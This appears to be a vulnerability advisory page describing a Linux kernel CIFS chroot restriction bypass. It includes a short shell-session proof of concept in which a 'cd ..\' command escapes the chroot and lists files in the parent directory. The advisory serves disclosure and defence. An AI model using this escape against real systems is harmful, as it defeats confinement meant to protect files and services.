|
|
Linux Kernel CIFS CHRoot Security Restriction Bypass Vulnerability
This issue can be exploited via normal system commands. The following proof of concept is available: root@server me]# pwd /path/to/my/dir [root@server me]# ls bin chroot etc lib [root@server me]# chroot . bash-2.05a# pwd / bash-2.05a# ls bin chroot etc lib bash-2.05a# cd ..\bash-2.05a# pwd /..bash-2.05a# ls <list of files from parent> |
|
Privacy Statement |